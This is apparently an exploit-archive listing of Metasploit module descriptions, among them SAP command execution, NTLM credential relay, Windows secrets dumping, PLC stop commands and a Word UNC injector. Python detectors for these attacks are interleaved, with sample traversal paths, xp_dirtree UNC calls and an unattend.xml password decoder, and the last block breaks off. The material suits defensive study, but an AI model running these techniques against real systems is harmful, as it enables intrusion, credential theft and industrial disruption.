
Remote Files

SAP Solution Manager Remote Unauthorized OS Commands Execution
Posted Aug 31, 2024
Authored by Dmitry Chastuhin, Pablo Artuso, Vladimir Ivanov, Yvan Genuer | Site metasploit.com

This Metasploit module exploits CVE-2020-6207 in the SAP EEM servlet (tc~smd~agent~application~eem) of SAP Solution Manager (SolMan) 7.2. The vulnerability is a missing authentication check on SOAP requests to /EemAdminService/EemAdmin, which lets an unauthenticated caller list connected SMDAgents, make them send HTTP requests (SSRF), and execute OS commands on a connected SMDAgent. The module works reliably against connected SMDAgents running Java 1.8. Successful exploitation gives an unauthenticated remote attacker SSRF and OS command execution on the agent host as the user the SMDAgent service runs as, usually daaadm.

tags | exploit, java, remote, web
advisories | CVE-2020-6207
SHA-256 | d3cd670695bc394e4f3ed861de2d7c717dac789ada16fbb0c7c9e1612d66ab86
WebEx Remote Command Execution Utility
Posted Aug 31, 2024
Authored by Ron Bowes | Site metasploit.com

This Metasploit module enables the execution of a single command as SYSTEM by exploiting a remote code execution vulnerability in Cisco's WebEx client software.

tags | exploit, remote, code execution
advisories | CVE-2018-15442
SHA-256 | ff7ba8eee04116c187733d871f1d2cdcba7bf879d893d5749316164a92cbcb78
TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access
Posted Aug 31, 2024
Authored by aushack, Anshul Pandey | Site metasploit.com

This Metasploit module tests for a directory traversal vulnerability in the UpdateAgent function of the OfficeScanNT Listener (TmListen.exe) service in Trend Micro OfficeScan. It allows remote attackers to read arbitrary files as SYSTEM via dot-dot sequences in an HTTP request.

tags | exploit, remote, web, arbitrary
advisories | CVE-2008-2439
SHA-256 | f9f4a1cffb076eaa8de5b999f9dcbffa5aea4de87901e76b8a98aeaadfed7549
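The listener bug above is the classic dot-dot traversal in an HTTP request path. The following detection logic is an added example, not code from the module or from Trend Micro: it parses Common Log Format access-log lines, normalises the request path (double percent-decoding and backslash-to-slash, so %2e%2e, %252e%252e and ..%5c variants are caught), and flags any request that would climb above the document root. The log lines are constructed for the example; a path such as /css/../img/x.png that stays inside the root is deliberately not flagged.

```python
"""Spot traversal attempts (including encoded and backslash variants) in web server access logs."""
import re
from typing import Dict, List
from urllib.parse import unquote

# Common Log Format: client, ident, user, [time], "METHOD path PROTO", status, size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')


def normalize_path(raw: str) -> str:
    """Percent-decode twice (catches %252e double encoding) and unify path separators."""
    decoded = unquote(unquote(raw))
    return decoded.replace("\\", "/")


def escapes_root(path: str) -> bool:
    """True if resolving '..' segments would ever climb above the document root.
    A path like /css/../img/x.png stays inside the root and is not flagged."""
    depth = 0
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def scan_access_log(lines: List[str]) -> List[Dict]:
    """Return one record per request whose normalised path escapes the root."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, raw_path, status = m.groups()
        norm = normalize_path(raw_path.split("?", 1)[0])
        if escapes_root(norm):
            hits.append({"client": client, "method": method, "raw": raw_path,
                         "normalized": norm, "status": int(status)})
    return hits


# Constructed sample lines; the paths mirror the shape of a listener traversal, not captured traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Sep/2024:10:00:00 +0000] "GET /activeupdate/../../../../../../windows/win.ini HTTP/1.1" 200 92',
    '10.0.0.5 - - [01/Sep/2024:10:00:01 +0000] "GET /activeupdate/%2e%2e/%2e%2e/%2e%2e/windows/system32/config/SAM HTTP/1.1" 403 0',
    '10.0.0.9 - - [01/Sep/2024:10:00:02 +0000] "GET /activeupdate/server.ini HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Sep/2024:10:00:03 +0000] "GET /static/css/../img/logo.png HTTP/1.1" 200 1024',
    '10.0.0.5 - - [01/Sep/2024:10:00:04 +0000] "GET /activeupdate/..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 200 92',
    '10.0.0.5 - - [01/Sep/2024:10:00:05 +0000] "GET /activeupdate/%252e%252e/%252e%252e/boot.ini HTTP/1.1" 200 80',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["client"], hit["status"], hit["normalized"])
```

A 403 still counts as an attempt worth alerting on; the status only tells you whether the server happened to block that particular encoding.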
Microsoft SQL Server NTLM Stealer
Posted Aug 31, 2024
Authored by Jay Turla | Site metasploit.com

This Metasploit module can be used to help capture or relay the LM/NTLM credentials of the account running the remote SQL Server service. The module uses the supplied credentials to connect to the target SQL Server instance and execute the native "xp_dirtree" or "xp_fileexist" stored procedure with a UNC path, which forces the service account to authenticate to the system defined in the SMBProxy option. For the attack to succeed, the SMB capture or relay module must be running on the system defined as SMBProxy. The database account used to connect only needs the "PUBLIC" role to execute these procedures. Successful execution usually results in local administrative access to the Windows system; in particular, it works well for relaying credentials between two SQL Servers that share a service account to get shells. If the relay fails, the captured LM challenge-response can still be cracked with the HalfLM rainbow tables and John the Ripper, provided the client still sends LMv1/NTLMv1 responses. Thanks to "Sh2kerr", who wrote the ora_ntlm_stealer, for the inspiration.

tags | exploit, remote, shell, local
systems | windows
SHA-256 | 81b720701c4c84c8a82d86441f0a1e83afb72be7237f8d733a14565354c12a53
Microsoft SQL Server SQL Injection NTLM Stealer
Posted Aug 31, 2024
Authored by Antti, nullbind | Site metasploit.com

This Metasploit module can be used to help capture or relay the LM/NTLM credentials of the account running the remote SQL Server service. The module uses the SQL injection in the URL supplied through the GET_PATH option to reach the target SQL Server instance and execute the native "xp_dirtree" stored procedure with a UNC path, which forces the service account to authenticate to the system defined in the SMBProxy option. For the attack to succeed, the SMB capture or relay module must be running on the system defined as SMBProxy. The database account behind the injected query only needs the "PUBLIC" role to execute the procedure. Successful execution usually results in local administrative access to the Windows system; in particular, it works well for relaying credentials between two SQL Servers that share a service account to get shells. If the relay fails, the captured LM challenge-response can still be cracked with the HalfLM rainbow tables and John the Ripper, provided the client still sends LMv1/NTLMv1 responses.

tags | exploit, remote, shell, local, sql injection
systems | windows
SHA-256 | 07d8028c67f4c74422fce026d3e4f7c8c01787a332652cb8847f7c5bc5571deb
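The two SQL Server modules above rely on the same primitive: a UNC path handed to xp_dirtree or xp_fileexist makes the SQL Server service account authenticate outbound over SMB. The detection logic below is an added example, not part of either module: it scans flattened audit statements for those procedures and flags UNC targets outside an allow list. The "login|statement" format, the allow-listed hosts and the sample statements are constructed for the example.

```python
"""Flag SQL Server calls that force the service account to authenticate to a UNC path."""
import re
from typing import Dict, List

# Extended procedures that make the SQL Server service account open a caller-supplied path.
UNC_FORCING_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs", "xp_getfiledetails")
PROC_RE = re.compile(r"\b(" + "|".join(UNC_FORCING_PROCS) + r")\b", re.IGNORECASE)
# \\host\share... inside a T-SQL string literal (two literal backslashes, then the host).
UNC_RE = re.compile(r"\\\\([A-Za-z0-9_.\-]+)(?:\\[^'\"\s,]*)?")

# Assumption: the only file servers the instance should ever reach over SMB.
ALLOWED_UNC_HOSTS = {"fileserver.corp.example", "backup01.corp.example"}

# Constructed sample in a simple "login|statement" form, as a SQL audit or
# Extended Events export might be flattened to; not real traffic.
SAMPLE_AUDIT = [
    "svc_web|EXEC master..xp_dirtree '\\\\10.10.14.7\\share', 1, 1",
    "reporting|SELECT name FROM sys.tables",
    "svc_app|EXEC master.sys.xp_fileexist '\\\\fileserver.corp.example\\backups\\x.bak'",
    "svc_web|exec xp_dirtree '\\\\198.51.100.9\\pwn'",
    "svc_web|EXEC xp_dirtree 'C:\\inetpub\\logs'",
]


def analyze_statement(login: str, stmt: str) -> Dict:
    """Return a finding for one statement, or {} when it calls no UNC-forcing procedure."""
    proc = PROC_RE.search(stmt)
    if not proc:
        return {}
    unc = UNC_RE.search(stmt)
    host = unc.group(1).lower() if unc else None
    return {
        "login": login,
        "proc": proc.group(1).lower(),
        "host": host,
        # A UNC target outside the allow list is the relay/capture pattern; a local
        # path is noisy but does not trigger an outbound authentication.
        "suspicious": host is not None and host not in ALLOWED_UNC_HOSTS,
    }


def scan_audit(lines: List[str]) -> List[Dict]:
    """Run analyze_statement over every "login|statement" line."""
    findings = []
    for line in lines:
        login, _, stmt = line.partition("|")
        f = analyze_statement(login, stmt)
        if f:
            findings.append(f)
    return findings


def suspicious_logins(lines: List[str]) -> Dict[str, int]:
    """Count suspicious calls per login, for alert thresholds."""
    counts: Dict[str, int] = {}
    for f in scan_audit(lines):
        if f["suspicious"]:
            counts[f["login"]] = counts.get(f["login"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_audit(SAMPLE_AUDIT):
        print(f)
    print(suspicious_logins(SAMPLE_AUDIT))
```

On the defensive side the cheapest fix is the one the descriptions imply: these procedures are executable by PUBLIC by default, so revoking EXECUTE on them from PUBLIC, together with blocking SMB egress from database hosts, removes the primitive for both modules.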
Android Browser Remote Code Execution Through Google Play Store XFO
Posted Aug 31, 2024
Authored by Rafay Baloch, joev | Site metasploit.com

This Metasploit module combines two vulnerabilities to achieve remote code execution on affected Android devices. First, it exploits CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in versions of Android's open source stock browser (the AOSP Browser) prior to 4.4. Second, the Google Play store's web interface fails to enforce an X-Frame-Options: DENY header (XFO) on some error pages and can therefore be targeted for script injection. As a result, this leads to remote code execution through Google Play's remote installation feature, since any application available on the Google Play store can be installed and launched on the user's device. This Metasploit module requires that the user is logged into Google with a vulnerable browser. To list the activities in an APK, you can use aapt dump badging /path/to/app.apk.

tags | exploit, remote, web, vulnerability, code execution, xss
advisories | CVE-2014-6041
SHA-256 | 328d1360b3bebdb1d86c00098a6491927d2bd65f1172897b674f5d8cc7695731
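The second half of the chain above is a framing-protection gap on error pages only. The check below is an added example, not code from the module: given a set of responses it decides, per URL, whether an attacker origin could frame the page, applying CSP frame-ancestors ahead of X-Frame-Options and handling the edge cases that trip up quick greps (multiple conflicting XFO values, the obsolete ALLOW-FROM, invalid tokens). The URLs and headers are constructed for the example.

```python
"""Decide whether a response can be framed by a given origin (X-Frame-Options and CSP frame-ancestors)."""
from typing import Dict, Optional


def _header(headers: Dict[str, str], name: str) -> Optional[str]:
    """Case-insensitive header lookup."""
    for k, v in headers.items():
        if k.lower() == name.lower():
            return v
    return None


def _csp_allows(csp: str, page_origin: str, framer_origin: str) -> Optional[bool]:
    """Evaluate frame-ancestors; None if the policy has no such directive."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if not parts or parts[0].lower() != "frame-ancestors":
            continue
        sources = [s.strip("'").lower() for s in parts[1:]]
        if not sources or "none" in sources:
            return False
        if "*" in sources:
            return True
        if "self" in sources and framer_origin.lower() == page_origin.lower():
            return True
        return framer_origin.lower() in sources
    return None


def framing_allowed(headers: Dict[str, str], page_origin: str, framer_origin: str) -> bool:
    """True if framer_origin can load the page in an iframe.
    CSP frame-ancestors wins over X-Frame-Options when both are present."""
    csp = _header(headers, "Content-Security-Policy")
    if csp is not None:
        verdict = _csp_allows(csp, page_origin, framer_origin)
        if verdict is not None:
            return verdict
    xfo = _header(headers, "X-Frame-Options")
    if xfo is None:
        return True
    values = [v.strip().upper() for v in xfo.split(",")]
    if len(values) != 1:
        return False  # conflicting values: browsers refuse to render the page in a frame
    if values[0] == "DENY":
        return False
    if values[0] == "SAMEORIGIN":
        return framer_origin.lower() == page_origin.lower()
    # ALLOW-FROM is obsolete and any other token is invalid; both leave the page frameable.
    return True


def audit_responses(responses: Dict[str, Dict[str, str]], page_origin: str,
                    attacker_origin: str) -> Dict[str, bool]:
    """Map each URL to whether the attacker origin can frame it."""
    return {url: framing_allowed(h, page_origin, attacker_origin) for url, h in responses.items()}


# Constructed headers for three paths on one site: the error page lacks any framing control.
SAMPLE_RESPONSES = {
    "https://store.example/apps/details?id=x": {"X-Frame-Options": "SAMEORIGIN", "Content-Type": "text/html"},
    "https://store.example/error/404": {"Content-Type": "text/html"},
    "https://store.example/account": {
        "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
        "X-Frame-Options": "ALLOW-FROM https://partner.example",
    },
}

if __name__ == "__main__":
    print(audit_responses(SAMPLE_RESPONSES, "https://store.example", "https://evil.example"))
```

The practical point is the one the module exploits: a site is only as protected as its least-protected path, so an audit has to cover error handlers and redirects, not just the main application pages.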
Schneider Modicon Remote START/STOP Command
Posted Aug 31, 2024
Authored by Tod Beardsley, K. Reid Wightman | Site metasploit.com

Schneider Modicon PLCs of the Unity series use Modbus function code 90 (0x5a) to perform administrative commands without authentication. This Metasploit module allows a remote user to switch the PLC between STOP and RUN, letting an attacker halt the process the PLC controls. It is based on the original modiconstop.rb Basecamp module from DigitalBond.

tags | exploit, remote
SHA-256 | b1ab2b6cc51066fbc4e2694146c089e9ffe0bd212d9fdf2475b47cf4afabb543
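Because the administrative channel above is plain Modbus/TCP with a vendor function code, it is easy to watch for on the wire. The code below is an added example, not part of the module: it frames a reassembled TCP stream using the MBAP length field and returns every PDU carrying function code 90. The sample stream is constructed; the data bytes in the FC 90 frame are placeholders and not the real UMAS STOP command.

```python
"""Split a Modbus/TCP stream into frames and flag Schneider function code 90 (UMAS) traffic."""
import struct
from typing import Dict, Iterator, List

FC_UMAS = 0x5A  # function code 90: Schneider administrative channel, no authentication


def build_frame(tid: int, unit: int, fc: int, data: bytes) -> bytes:
    """MBAP header (transaction id, protocol id 0, length, unit id) followed by the PDU."""
    pdu = bytes([fc]) + data
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


def iter_modbus_frames(stream: bytes) -> Iterator[Dict]:
    """Walk a reassembled TCP byte stream using the MBAP length field; stops at a truncated tail."""
    off = 0
    while off + 7 <= len(stream):
        tid, pid, length, unit = struct.unpack(">HHHB", stream[off:off + 7])
        if pid != 0 or length < 2:
            raise ValueError(f"not a Modbus/TCP frame at offset {off}")
        end = off + 6 + length
        if end > len(stream):
            break  # partial frame: wait for more data
        pdu = stream[off + 7:end]
        yield {"tid": tid, "unit": unit, "fc": pdu[0], "data": pdu[1:]}
        off = end


def flag_admin_frames(stream: bytes) -> List[Dict]:
    """Frames carrying FC 90. On a plant network these should only ever come from
    engineering workstations; anything else is a candidate STOP/RUN or firmware command."""
    return [f for f in iter_modbus_frames(stream) if f["fc"] == FC_UMAS]


# Constructed sample: a normal Read Holding Registers poll, one FC 90 frame, another poll.
SAMPLE_STREAM = (
    build_frame(1, 0, 0x03, struct.pack(">HH", 0, 10))
    + build_frame(2, 0, FC_UMAS, b"\x00\x01\x02")
    + build_frame(3, 0, 0x03, struct.pack(">HH", 10, 10))
)

if __name__ == "__main__":
    for f in flag_admin_frames(SAMPLE_STREAM):
        print(f"tid={f['tid']} unit={f['unit']} fc=0x{f['fc']:02x} data={f['data'].hex()}")
```

Pair the FC 90 match with a source-address allow list of engineering stations; a STOP issued from anywhere else is the event the module above produces.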
PhoenixContact PLC Remote START/STOP Command
Posted Aug 31, 2024
Authored by Photubias | Site metasploit.com

PhoenixContact Programmable Logic Controllers are built upon a variant of ProConOS and communicate using a proprietary protocol over TCP/1962 and TCP/41100 or TCP/20547. This module allows a remote user to read the PLC type, firmware and build number on TCP/1962, and to read the CPU state (running or stopped) and start or stop the CPU on TCP/41100 (confirmed on the ILC 15x and 17x series) or TCP/20547 (confirmed on the ILC 39x series).

tags | exploit, remote, tcp, protocol
advisories | CVE-2014-9195
SHA-256 | 121da6ea0c1ed5792460a8fc75979c956e19cb91d2f862453bd1833c0c4711f2
IBM DB2 Db2rcmd.exe Command Execution
Posted Aug 31, 2024
Authored by Jay Turla | Site metasploit.com

This Metasploit module exploits a vulnerability in the Remote Command Server component of IBM's DB2 Universal Database 8.1. An authenticated attacker can send arbitrary commands to the DB2REMOTECMD named pipe, which can lead to administrator privileges.

tags | exploit, remote, arbitrary
advisories | CVE-2004-0795
SHA-256 | 478193d2580253a2f66c4e73298df32bcc3e7667b42fee08c31d7762a5f91cfc
SAP MaxDB Cons.exe Remote Command Injection
Posted Aug 31, 2024
Authored by Jay Turla | Site metasploit.com

SAP MaxDB is prone to a remote command-injection vulnerability because the application fails to properly sanitize user-supplied input.

tags | exploit, remote
advisories | CVE-2008-0244
SHA-256 | 0f0e0a18de2600d553a92c2cbf013099ea676612defd9a621268fe33532cc601
Android Mercury Browser Intent URI Scheme And Directory Traversal
Posted Aug 31, 2024
Authored by sinn3r, joev, rotlogix | Site metasploit.com

This Metasploit module exploits an unsafe intent URI scheme and directory traversal found in Android Mercury Browser version 3.2.3. The intent allows the attacker to invoke a private wifi manager activity, which starts a web server for Mercury on port 8888. The web server also suffers from a directory traversal that allows remote access to sensitive files. By default, this module will go after webviewCookiesChromium.db, webviewCookiesChromiumPrivate.db, webview.db, and bookmarks.db. If this isn't enough, you can also specify the ADDITIONAL_FILES datastore option to collect more files.

tags | exploit, remote, web
SHA-256 | 42c6caf8a1093e6428f263ebc0ed216930afb756d1796e8f552f46a3d7e1ee90
Viproy CUCDM IP Phone XML Services Call Forwarding Tool
Posted Aug 31, 2024
Authored by fozavci | Site metasploit.com

The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM) 10 does not properly implement access control, which allows remote attackers to modify user information. This Metasploit module exploits the vulnerability to configure unauthorized call forwarding.

tags | exploit, remote, web
systems | cisco
advisories | CVE-2014-3300
SHA-256 | 762f21e6a5fbd5bc2b2530185a86b5249202eda276e8221ef037a769fc47d618
Viproy CUCDM IP Phone XML Services Speed Dial Attack Tool
Posted Aug 31, 2024
Authored by fozavci | Site metasploit.com

The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager (CDM), before version 10, doesn't implement access control properly, which allows remote attackers to modify user information. This Metasploit module exploits the vulnerability to make unauthorized speed dial entity manipulations.

tags | exploit, remote, web
systems | cisco
advisories | CVE-2014-3300
SHA-256 | a29708e3220657b7459cd2f5c8e3e1289481738bbee9189c1a1060eacd56bd6b
Java RMI Registry Interfaces Enumeration
Posted Aug 31, 2024
Authored by Jay Turla | Site metasploit.com

This Metasploit module gathers information from an RMI endpoint running an RMI registry interface. It enumerates the names bound in a registry and looks up each remote reference.

tags | exploit, remote, registry
SHA-256 | f622e943187d30330e9cc0618caace1cafb414ae300f57c1786d7e281a8a1511
HP ProCurve SNAC Domain Controller Credential Dumper
Posted Aug 31, 2024
Authored by rgod, juan vazquez | Site metasploit.com

This Metasploit module will extract Domain Controller credentials from vulnerable installations of HP SNAC as distributed with HP ProCurve 4.00 and 3.20. The same authentication bypass vulnerability has been used for remote file uploads; here it is used to gather sensitive information handled by the application, such as plaintext domain controller credentials. This Metasploit module has been tested successfully with HP SNAC included with ProCurve Manager 4.0.

tags | exploit, remote, bypass, file upload
SHA-256 | aed454bc14ce73f32076d32a64079806c8be0da490907a6f04fd8ad00e038838
HP Operations Manager Perfd Environment Scanner
Posted Aug 31, 2024
Authored by Jay Turla | Site metasploit.com

This Metasploit module will enumerate the process list of a remote machine by abusing HP Operations Manager's unauthenticated perfd daemon.

tags | exploit, remote
SHA-256 | 48743288737e4fbe8b23b6415022b845900894d016893aeebdbd614a86291a45
Windows Secrets Dump
Posted Aug 31, 2024
Authored by Alberto Solino, Christophe de la Fuente, antuache | Site metasploit.com

Dumps SAM hashes and LSA secrets (including cached credentials) from the remote Windows target without executing any agent locally. This is done by remotely updating the registry key security descriptor, taking advantage of the WriteDACL privilege held by local administrators to set temporary read permissions. This can be disabled by setting the INLINE option to false, in which case the module falls back to the original implementation, which consists of saving the registry hives locally on the target (%SYSTEMROOT%\Temp\<random>.tmp), downloading the temporary hive files and reading the data from them. The temporary files are removed when it is done. On domain controllers, secrets from Active Directory are extracted using [MS-DRSR] DRSGetNCChanges(), replicating the attributes needed to get SIDs, NTLM hashes, groups, password history, Kerberos keys and other interesting data. Note that the actual NTDS.dit file is not downloaded; instead, the Directory Replication Service is asked directly through RPC requests. This Metasploit module takes care of starting or enabling the Remote Registry service if needed and restores the service to its original state when it is done. This is a port of the great Impacket secretsdump.py code written by Alberto Solino.

tags | exploit, remote, local, registry
systems | windows
SHA-256 | 2c2374c930c873d22b4c85b045bb0508b32f1c378ce30ec41a5db088c7033190
MS14-052 Microsoft Internet Explorer XMLDOM Filename Disclosure
Posted Aug 31, 2024
Authored by Soroush Dalili, sinn3r | Site metasploit.com

This Metasploit module uses the Microsoft XMLDOM object to enumerate filenames on a remote machine. It targets Internet Explorer 8 and Internet Explorer 9. To use it, you must supply your own list of file paths. Each file path should look like this: c:\\\\windows\\\\system32\\\\calc.exe.

tags | exploit, remote
systems | windows
advisories | CVE-2013-7331
SHA-256 | c954ae2d29b081470b554c9f8c12ad7049c63dccc594927203b359634db62c4c
Microsoft Windows Deployment Services Unattend Gatherer
Posted Aug 31, 2024
Authored by Jay Turla | Site metasploit.com

This Metasploit module will search remote file shares for unattended installation files that may contain domain credentials. This is often used after discovering domain credentials with the auxiliary/scanner/dcerpc/windows_deployment_services module or in cases where you already have domain credentials. This Metasploit module will connect to the RemInst share and any Microsoft Deployment Toolkit shares indicated by the share name comments.

tags | exploit, remote
SHA-256 | a8922994530f36b9a0330bad4526173ba5b06c6d7826f747b774c31f20810f33
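The credentials the gatherer above is looking for sit in a well-defined place: AutoLogon, AdministratorPassword and LocalAccount password elements in unattend.xml, where non-plaintext values are base64 of the UTF-16LE password with the literal word "Password" appended. The parser below is an added example, not the module's code: it walks an answer file, recovers each password and the account it belongs to, and handles both the encoded and PlainText forms. The answer file, accounts and passwords are constructed for the example.

```python
"""Pull credentials out of unattend.xml / sysprep answer files found on deployment shares."""
import base64
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

NS = "{urn:schemas-microsoft-com:unattend}"


def decode_unattend_password(value: str, plaintext: bool) -> str:
    """Windows stores non-plaintext answer-file passwords as base64(UTF-16LE(password + "Password"))."""
    if plaintext:
        return value
    raw = base64.b64decode(value).decode("utf-16-le")
    return raw[:-len("Password")] if raw.endswith("Password") else raw


def extract_credentials(xml_text: str) -> List[Dict[str, Optional[str]]]:
    """Find every *Password element carrying a Value and recover the account it belongs to."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    found = []
    for el in root.iter():
        if not el.tag.endswith("Password"):
            continue
        value = el.findtext(NS + "Value")
        if value is None:
            continue
        plain = (el.findtext(NS + "PlainText") or "false").strip().lower() == "true"
        holder = parent_of.get(el)
        user = domain = None
        if holder is not None:
            # AutoLogon carries <Username>, LocalAccount carries <Name>.
            user = holder.findtext(NS + "Username") or holder.findtext(NS + "Name")
            domain = holder.findtext(NS + "Domain")
        if user is None and el.tag == NS + "AdministratorPassword":
            user = "Administrator"
        found.append({
            "source": el.tag.replace(NS, ""),
            "user": user,
            "domain": domain,
            "password": decode_unattend_password(value, plain),
        })
    return found


def _enc(password: str) -> str:
    """Encode the way Windows Setup does, used only to build the constructed sample below."""
    return base64.b64encode((password + "Password").encode("utf-16-le")).decode()


# Constructed answer file; the accounts and passwords are invented for the example.
SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>{_enc('Winter2024!')}</Value><PlainText>false</PlainText></Password>
        <Enabled>true</Enabled>
        <Username>svc_deploy</Username>
        <Domain>CORP</Domain>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword><Value>{_enc('L0calAdm1n')}</Value><PlainText>false</PlainText></AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Password><Value>Temp123</Value><PlainText>true</PlainText></Password>
            <Name>helpdesk</Name>
            <Group>Administrators</Group>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>"""

if __name__ == "__main__":
    for cred in extract_credentials(SAMPLE_UNATTEND):
        print(cred)
```

The same parser works for defenders auditing their own RemInst and MDT shares: any non-empty result is a credential that should not be readable by every domain user.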
Adobe ColdFusion Unauthenticated Arbitrary File Read
Posted Aug 31, 2024
Authored by Andrew | Site metasploit.com

This Metasploit module exploits a remote unauthenticated deserialization of untrusted data vulnerability in Adobe ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in order to read an arbitrary file from the server. To run this module you must provide a valid ColdFusion Component (CFC) endpoint via the CFC_ENDPOINT option, and a valid remote method name from that endpoint via the CFC_METHOD option. By default an endpoint in the ColdFusion Administrator (CFIDE) is provided. If the CFIDE is not accessible you will need to choose a different CFC endpoint, method and parameters.

tags | exploit, remote, arbitrary
advisories | CVE-2023-26360
SHA-256 | de661edb8896e72bade0f7599cfd12c9bedfd968ff8993ef271deae86817594a
QNAP NAS/NVR Administrator Hash Disclosure
Posted Aug 31, 2024
Authored by bashis, wvu, Donald Knuth | Site metasploit.com

This Metasploit module exploits combined heap and stack buffer overflows in QNAP NAS and NVR devices to dump the admin (root) shadow hash from memory via an overwrite of __libc_argv[0] in the HTTP-header-bound glibc backtrace. A binary search is performed to find the correct offset for the overflows. Since the server forks, blind remote exploitation is possible, provided the heap is not subject to ASLR.

tags | exploit, remote, web, overflow, root
SHA-256 | 95c0e11fc546ab62299c2204c0f7af71c9e0fb6c816a661a92afe279a76f00e3
Oracle Application Testing Suite Post-Auth DownloadServlet Directory Traversal
Posted Aug 31, 2024
Authored by sinn3r, Steven Seeley | Site metasploit.com

This Metasploit module exploits a vulnerability in Oracle Application Testing Suite (OATS). In the Load Testing interface, a remote user can abuse the custom report template selector to make the DownloadServlet class read any file on the server as SYSTEM. Since the Oracle application contains multiple configuration files with encrypted credentials, and public resources exist for decrypting them, it is possible to turn this directory traversal into remote code execution. Note that authentication is required. By default, OATS has two built-in accounts, default and administrator, which you could try to target first.

tags | exploit, remote, code execution
advisories | CVE-2019-2557
SHA-256 | 6768bb30a4e171d5b23ae9e466794b809255fbc336984aad796d15fe8f495a0b
Cisco RV320/RV326 Configuration Disclosure
Posted Aug 31, 2024
Authored by Aaron Soto, RedTeam Pentesting GmbH | Site metasploit.com

A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability.

tags | exploit, remote, web
systems | cisco
advisories | CVE-2019-1653
SHA-256 | ae43a8160ec3b8d1f33b4bc9d020eb6ea0ce8e6b3ec100f14fa67f439395f1a7
CrushFTP Unauthenticated Arbitrary File Read
Posted Aug 31, 2024
Authored by remmons-r7 | Site metasploit.com

This Metasploit module leverages an unauthenticated server-side template injection vulnerability in CrushFTP versions before 10.7.1 and before 11.1.0 (as well as legacy 9.x versions). Attackers can submit template injection payloads to the web API without authentication; when the payloads are reflected in the server's responses, they are evaluated. The primary impact of the injection is arbitrary file read as root, which can result in authentication bypass, remote code execution, and NetNTLMv2 theft (when the host OS is Windows and SMB egress traffic is permitted).

tags | exploit, remote, web, arbitrary, root, code execution
systems | windows
advisories | CVE-2024-4040
SHA-256 | 060ed45f18a940bd2cb20db82dafffe7261720b5012750515c313f3b78cd0cde
Microsoft Word UNC Path Injector
Posted Aug 31, 2024
Authored by SphaZ | Site metasploit.com

This Metasploit module modifies a .docx file so that, upon opening, it submits the user's stored NetNTLM credentials to a remote host. It can also create an empty .docx file. If emailed, the recipient needs to put the document in editing mode before the remote server is contacted; preview and read-only mode do not trigger it. Verified to work with Microsoft Word 2003, 2007, 2010 and 2013. To capture the hashes, the auxiliary/server/capture/smb module can be used.

tags | exploit, remote
SHA-256 | 898db9627d5fe0a60eb2c43c9ba3c13690b02c22026bd42660cce6d96a78a01b
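A .docx is a zip of XML parts, and any reference that makes Word reach out to a host lives in one of its .rels parts as a relationship with TargetMode="External". The scanner below is an added example, not the module's code: it opens a .docx in memory, walks every .rels part and reports external relationships whose target is a UNC path (or a file: URL to one). The builder that produces the sample document is constructed for the example and assumes an external attachedTemplate relationship in word/_rels/settings.xml.rels is the hook Word resolves on edit; the package it writes is the minimum the scanner needs, not a document Word will open.

```python
"""Find OOXML relationships that point at UNC paths, the hook a UNC-injected .docx relies on."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_NS = "{" + PKG_REL_NS + "}"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def unc_host(target: str) -> Optional[str]:
    """Host part of a UNC target (\\\\host\\share\\... or a file: URL to one); None otherwise."""
    t = target.strip()
    if t.lower().startswith("file:"):
        t = t[5:]
    t = t.replace("/", "\\")
    if not t.startswith("\\\\"):
        return None
    host = t.lstrip("\\").split("\\", 1)[0]
    if not host or re.fullmatch(r"[A-Za-z]:", host):
        return None  # file:///C:/... is a local drive, not a network target
    return host


def scan_docx(data: bytes) -> List[Dict[str, Optional[str]]]:
    """Walk every .rels part and report external relationships whose target is a UNC path."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                host = unc_host(rel.get("Target", ""))
                if host:
                    findings.append({
                        "part": name,
                        "id": rel.get("Id"),
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": rel.get("Target"),
                        "host": host,
                    })
    return findings


def build_sample_docx(template_target: str) -> bytes:
    """Construct a minimal package whose settings part carries an external attachedTemplate
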